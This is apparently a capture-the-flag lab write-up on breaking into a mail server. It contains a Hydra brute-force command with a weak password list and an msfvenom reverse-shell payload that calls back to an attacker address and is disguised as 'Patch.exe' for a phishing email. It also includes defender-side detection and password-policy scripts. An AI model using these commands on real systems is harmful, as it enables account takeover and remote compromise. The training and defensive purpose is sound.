Throwback — Part 2 — Mail Server

This is the second article on the Throwback lab. In this article we will dig deeper into the initial exploitation of the Throwback mail server.

Web UI

After the Nmap scan in Part 1, we could identify that 10.200.70.232 is a mail server. The mail server also has a web UI running on port 80:

As you can see from the screenshot, there is a default account called tbhguest, and its credentials are given to us. We can log in to the account, read the email and retrieve the flag:

We can also retrieve a list of usernames and email addresses by going to the addresses page:

Brute Force

After retrieving the list of nicknames, I created a file called users.txt and put these nicknames into it. I also created a password list called passwords.txt with the following content:

securitycenter
Summer2020
Management2020
Management2018
Password2020
Throwback2020
Password123

Next, I brute-forced the login page with Hydra:

hydra -L users.txt -P passwords.txt 10.200.70.232 http-post-form '/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect' -v

After waiting 2 minutes, I had logins for 6 additional accounts:

One of the accounts (MurphyF) received an interesting email, which allows us to reset his credentials on the Timekeep server to murphyf:PASSWORD:

But we will come to that in an upcoming article.
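The Hydra run above is noisy from the server's point of view: one source address sends a burst of POST requests to /src/redirect.php in a short time. The following detection script is an added example for the defending side and is not part of the original write-up. It parses Apache-style access-log lines and flags any source IP that exceeds a threshold of login POSTs inside a sliding window. The log lines, the threshold, the window length and the client addresses other than the attacking host are constructed values for illustration.

```python
"""Brute-force detection for the webmail login (added defender-side example).

Not part of the original write-up. Scans Apache-style access-log lines for bursts
of POST requests to /src/redirect.php (the endpoint the Hydra command targets)
from one source IP inside a short window. Log lines, threshold and window length
are constructed/assumed values.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/src/redirect.php"   # login endpoint from the Hydra command
THRESHOLD = 20                     # assumed: login POSTs per window that count as abuse
WINDOW = timedelta(minutes=2)      # assumed: sliding window length

# Common Log Format: ip ident user [timestamp] "METHOD path HTTP/x" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \d+'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: peak_count} for source IPs whose login POSTs reach the threshold
    inside any sliding window of the given length.

    Only the request rate is used: a redirect-based login form may answer success
    and failure with the same status code (assumption about this webmail), so the
    HTTP status is deliberately not relied on.
    """
    per_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and ev["path"].startswith(LOGIN_PATH):
            per_ip[ev["ip"]].append(ev["ts"])

    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start, peak = 0, 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _sample_log():
    """Constructed sample log: one spraying source plus two ordinary users."""
    base = datetime(2020, 11, 1, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '%s - - [%s] "%s %s HTTP/1.1" %d 512'

    def stamp(seconds):
        return (base + timedelta(seconds=seconds)).strftime("%d/%b/%Y:%H:%M:%S %z")

    # 30 login POSTs in 58 seconds from the attacking host used in the write-up
    lines = [fmt % ("10.50.71.46", stamp(2 * i), "POST", LOGIN_PATH, 302)
             for i in range(30)]
    # ordinary activity from made-up client addresses (paths other than the
    # redirect endpoint are also made up)
    lines.append(fmt % ("10.200.70.10", stamp(5), "GET", "/src/login.php", 200))
    lines.append(fmt % ("10.200.70.10", stamp(9), "POST", LOGIN_PATH, 302))
    lines.append(fmt % ("10.200.70.11", stamp(40), "POST", LOGIN_PATH, 302))
    return lines


SAMPLE_LOG = _sample_log()

if __name__ == "__main__":
    for ip, count in find_bruteforce(SAMPLE_LOG).items():
        print("possible brute force from %s: %d login POSTs within %s" % (ip, count, WINDOW))
```

The sliding window is what keeps a slow, patient spray from hiding behind a fixed per-minute bucket; in practice the alert would also feed an account-lockout or rate-limit decision at the web server or WAF.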

Phishing

As we have a list of email accounts, the next logical step in this engagement was to phish these users. For this purpose I created a Meterpreter reverse shell and renamed it to “Patch.exe”:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.71.46 LPORT=1234 -f exe > NotAShell.exe
mv NotAShell.exe Patch.exe

After that I started a Metasploit multi/handler to handle incoming connections from compromised hosts:

The next step was creating a phishing mail. I simply used the guest account to send the following email, with the reverse shell attached:

After waiting for a while, I caught a reverse shell from 10.200.70.222 (THROWBACK-WS01), running as the user BlaireJ.
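The lure above only works because the mail server delivers a raw Windows executable as an attachment. The script below is an added example of the check a mail gateway or mailbox scanner would apply; it is not part of the original write-up. It parses a MIME message, walks its attachments and flags anything with a blocked file extension or a PE ("MZ") header, so a renamed executable is caught regardless of its filename. The sample messages, the addresses in them and the extension blocklist are constructed/assumed values.

```python
"""Inspect inbound mail for executable attachments (added defender-side example).

Not part of the original write-up. Parses a MIME message, walks its attachments
and flags anything with a blocked extension or a PE ("MZ") header, which catches a
renamed executable regardless of the filename. Sample messages, addresses and the
extension list are constructed/assumed values.
"""
import os
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Assumed blocklist of extensions a mail gateway would refuse outright.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta"}
PE_MAGIC = b"MZ"   # DOS/PE header that every Windows executable starts with


def suspicious_attachments(raw_message):
    """Return [(filename, [reasons])] for every attachment that should be blocked."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        reasons = []
        ext = os.path.splitext(name.lower())[1]
        if ext in BLOCKED_EXTENSIONS:
            reasons.append("blocked extension " + ext)
        if payload[:2] == PE_MAGIC:       # content check: renaming does not help
            reasons.append("PE executable header")
        if reasons:
            findings.append((name, reasons))
    return findings


def build_sample_message(filename, payload):
    """Construct a minimal test message with one attachment (addresses are made up)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "See attached"
    msg.set_content("Please see the attached file.")
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    sample = build_sample_message("Patch.exe", PE_MAGIC + b"\x00" * 62)
    for name, reasons in suspicious_attachments(sample):
        print("blocked attachment %r: %s" % (name, ", ".join(reasons)))
```

Checking the first bytes of the payload in addition to the extension is the important part: an extension filter alone is defeated by renaming the file, while the "MZ" header check fires on any PE binary whatever it is called.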

Remediation

There should not be a guest account for accessing the webmail. If one is needed, it should be restricted to the bare minimum of privileges. The compromised users should also change their passwords to more complex ones. The mail server should be configured with a stronger password policy: uppercase and lowercase letters, symbols and numbers, and a minimum of 12 characters. Users who fell victim to the phishing should also receive awareness training.
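The password policy stated above can be enforced at the point where users choose a new password. The following validator is an added example and is not part of the original write-up. It checks the stated rules (uppercase, lowercase, digit, symbol, at least 12 characters) and goes slightly beyond them: it also rejects passwords whose letters match one of the entries from the passwords.txt wordlist that succeeded against six accounts (so "Throwback2021!" is refused as well as "Throwback2020"), and passwords that contain the user's own username. The blocklist beyond that wordlist and the sample passwords are constructed values.

```python
"""Password-policy validator for the remediation above (added example).

Not part of the original write-up. Enforces the stated policy (upper- and
lowercase letters, digits, symbols, at least 12 characters) and additionally
rejects passwords built on the wordlist used in the brute-force step, or
containing the username. Sample passwords are constructed values.
"""
import string

MIN_LENGTH = 12   # minimum length stated in the remediation

# Seeded with the passwords.txt wordlist from the brute-force step.
WEAK_PASSWORDS = {
    "securitycenter", "Summer2020", "Management2020", "Management2018",
    "Password2020", "Throwback2020", "Password123",
}


def _letters_only(value):
    """Reduce a password to its lowercase letters, dropping digits and symbols."""
    return "".join(c for c in value.lower() if c.isalpha())


# "Summer2020" and "Summer2021!" share the base "summer", so compare on bases.
BLOCKED_BASES = {_letters_only(p) for p in WEAK_PASSWORDS}


def check_password(password, username=None):
    """Return a list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no symbol")
    if _letters_only(password) in BLOCKED_BASES:
        problems.append("based on a known weak password")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    return problems


def password_ok(password, username=None):
    """Convenience wrapper: True when the password satisfies the whole policy."""
    return not check_password(password, username)


if __name__ == "__main__":
    # Constructed samples: the first is from the brute-force wordlist.
    for candidate in ("Summer2020", "Throwback2021!", "Correct-Horse-Battery-9"):
        print("%-25s -> %s" % (candidate, check_password(candidate) or "ok"))
```

Note that every entry of the wordlist that cracked six accounts already fails the length or symbol rule on its own; the base-word check is what stops users from satisfying the new policy by appending a year and a punctuation mark to the same weak word.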
